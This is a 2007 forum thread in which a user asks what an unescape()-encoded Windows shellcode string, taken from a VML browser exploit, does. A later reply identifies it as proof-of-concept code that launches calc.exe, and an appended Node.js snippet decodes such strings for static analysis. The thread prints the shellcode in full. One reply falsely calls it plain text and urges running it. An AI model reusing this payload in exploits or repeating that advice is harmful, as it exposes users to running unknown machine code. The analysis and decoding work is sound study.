
unescape shellcode


3 replies to this topic

#1 scriptkiddy

scriptkiddy

    H4x0r

  • Members
  • 39 posts

Posted 17 January 2007 - 04:11 AM

shellcode =
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");


What does this shellcode do...

plz help

#2 B0rg

B0rg

    Gibson Hacker

  • Members
  • 98 posts

Posted 17 January 2007 - 11:27 AM

It just deobfuscates some text.

The unescape() function decodes a string encoded with escape().

http://www.w3schools...ef_unescape.asp

Run it and the text should appear! :P



:borg:

Edited by B0rg, 17 January 2007 - 11:28 AM.


#3 scriptkiddy

scriptkiddy

    H4x0r

  • Members
  • 39 posts

Posted 17 January 2007 - 01:25 PM

> It just deobfuscates some text.
>
> The unescape() function decodes a string encoded with escape().
>
> http://www.w3schools...ef_unescape.asp
>
> Run it and the text should appear! :P
>
> :borg:


Thanks for your reply... but I was not looking for what the unescape () function does... I was looking for what the shell code does... I found this on the latest VML exploit... I wanted to know what that shell code is doing to the system...

#4 DanielG

DanielG

    SUP3R 31337 P1MP

  • Members
  • 294 posts
  • Location:The Netherlands

Posted 17 January 2007 - 01:33 PM

The shellcode is identical to the one used on http://www.jaascois.com/news/54600096/ (code for launching "calc.exe" on Windows systems) except on the end your shellcode has %u0063 and theirs has %u7865%u0065.
This probably is just how they clean up after themselves and is a small part of the code that is different, but it does the same.

The shellcode you posted is used in a hell of a lot of PoC vulns on Google, and is most likely just to start calc.exe.
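
Added example, not part of the thread: Node.js code that turns a `%uXXXX` string like the one in post #1 into raw bytes for static inspection, without executing anything, and lists the NUL-terminated printable strings in it. The function names `decodePercentU` and `asciiStrings` are chosen here; the sample input is the last four units of the posted payload.

```javascript
// Each %uXXXX is one UTF-16 code unit. On x86 the unit is stored
// little-endian, so %u63E7 ends up in memory as the bytes E7 63.
function decodePercentU(escaped) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|([\s\S])/g;
  let m;
  while ((m = re.exec(escaped)) !== null) {
    let unit;
    if (m[1] !== undefined) unit = parseInt(m[1], 16);      // %uXXXX
    else if (m[2] !== undefined) unit = parseInt(m[2], 16); // %XX
    else unit = m[3].charCodeAt(0);                         // literal character
    bytes.push(unit & 0xff, unit >> 8);                     // low byte first
  }
  return Buffer.from(bytes);
}

// Printable ASCII runs of at least minLen bytes that end in a NUL byte,
// i.e. candidates for C strings embedded after the code.
function asciiStrings(buf, minLen = 4) {
  const found = [];
  let start = -1;
  for (let i = 0; i < buf.length; i++) {
    const printable = buf[i] >= 0x20 && buf[i] <= 0x7e;
    if (printable) {
      if (start < 0) start = i;
      continue;
    }
    if (start >= 0 && buf[i] === 0x00 && i - start >= minLen) {
      found.push({ offset: start, text: buf.toString("latin1", start, i) });
    }
    start = -1;
  }
  return found;
}

// Tail of the payload from post #1 (last four %u units).
const TAIL = "%uFF57%u63E7%u6C61%u0063";

const raw = decodePercentU(TAIL);
console.log(raw.toString("hex"));   // bytes in memory order
console.log(asciiStrings(raw));     // embedded strings with offsets
```

Feeding the full string from post #1 through the same two functions gives the complete byte sequence, which can then be written to a file and loaded into a disassembler.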



